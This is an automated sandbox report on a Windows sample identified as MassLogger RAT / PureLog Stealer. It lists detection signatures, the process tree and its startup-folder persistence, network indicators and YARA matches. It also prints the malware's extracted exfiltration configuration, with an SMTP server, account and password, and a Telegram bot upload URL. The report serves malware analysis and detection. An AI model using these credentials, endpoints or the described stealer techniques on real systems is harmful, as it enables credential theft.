Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ref_97024130865.exe

Overview

General Information

Sample name:ref_97024130865.exe
Analysis ID:1576075
MD5:687af4583057dd6924f0102def1b8f89
SHA1:451232efa9e8891d1c87c81b9e5be3fb7e62e5b5
SHA256:caaff6d88cafff7aef0ccc6ba09e9e15b54763b8ee85054eff6d812edc5302c6
Tags:exeuser-adrian__luca
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ref_97024130865.exe (PID: 1772 cmdline: "C:\Users\user\Desktop\ref_97024130865.exe" MD5: 687AF4583057DD6924F0102DEF1B8F89)
    • nonplacental.exe (PID: 5028 cmdline: "C:\Users\user\Desktop\ref_97024130865.exe" MD5: 687AF4583057DD6924F0102DEF1B8F89)
      • RegSvcs.exe (PID: 6660 cmdline: "C:\Users\user\Desktop\ref_97024130865.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 6976 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • nonplacental.exe (PID: 5748 cmdline: "C:\Users\user\AppData\Local\juvenile\nonplacental.exe" MD5: 687AF4583057DD6924F0102DEF1B8F89)
      • RegSvcs.exe (PID: 3128 cmdline: "C:\Users\user\AppData\Local\juvenile\nonplacental.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"EXfil Mode": "SMTP", "From": "sendxpreview@ypcog.shop", "Password": "k4T*5ia*ES", "Server": "ypcog.shop", "To": "preview@ypcog.shop", "Port": 587}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2197923866.0000000003C60000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 37 88 44 24 2B 88 44 24 2F B0 AF 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 31 entries
          SourceRuleDescriptionAuthorStrings
          5.2.nonplacental.exe.3c60000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 37 88 44 24 2B 88 44 24 2F B0 AF 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          6.2.RegSvcs.exe.2970000.2.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            6.2.RegSvcs.exe.2970000.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              6.2.RegSvcs.exe.2970000.2.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                6.2.RegSvcs.exe.2970000.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 93 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , ProcessId: 6976, ProcessName: wscript.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , ProcessId: 6976, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\juvenile\nonplacental.exe, ProcessId: 5028, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-16T14:11:35.342732+010028032742Potentially Bad Traffic192.168.2.549704193.122.130.080TCP
                  2024-12-16T14:11:46.858321+010028032742Potentially Bad Traffic192.168.2.549706193.122.130.080TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "sendxpreview@ypcog.shop", "Password": "k4T*5ia*ES", "Server": "ypcog.shop", "To": "preview@ypcog.shop", "Port": 587}
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeReversingLabs: Detection: 73%
                  Source: ref_97024130865.exeReversingLabs: Detection: 73%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeJoe Sandbox ML: detected
                  Source: ref_97024130865.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: ref_97024130865.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49705 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49709 version: TLS 1.0
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: nonplacental.exe, 00000002.00000003.2077461971.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2078549075.0000000004190000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195475586.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195865927.0000000004270000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: nonplacental.exe, 00000002.00000003.2077461971.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2078549075.0000000004190000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195475586.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195865927.0000000004270000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0103445A
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0103C75C
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103C6D1 FindFirstFileW,FindClose,0_2_0103C6D1
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0103EF95
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0103F0F2
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0103F3F3
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_010337EF
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01033B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01033B12
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0103BCBC
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0065445A
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065C6D1 FindFirstFileW,FindClose,2_2_0065C6D1
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0065C75C
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0065EF95
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0065F0F2
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0065F3F3
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_006537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_006537EF
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00653B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00653B12
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0065BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0065BCBC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_00F8D4E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h6_2_0250D4E0
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                  Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.130.0:80
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49705 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49709 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_010422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_010422EE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01044164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01044164
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01044164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01044164
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_00664164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00664164
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_01043F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_01043F66
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0103001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0103001C
                  Source: C:\Users\user\Desktop\ref_97024130865.exeCode function: 0_2_0105CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0105CABC
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exeCode function: 2_2_0067CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0067CABC

                  System Summary

                  barindex
                  Source: 5.2.nonplacental.exe.3c60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
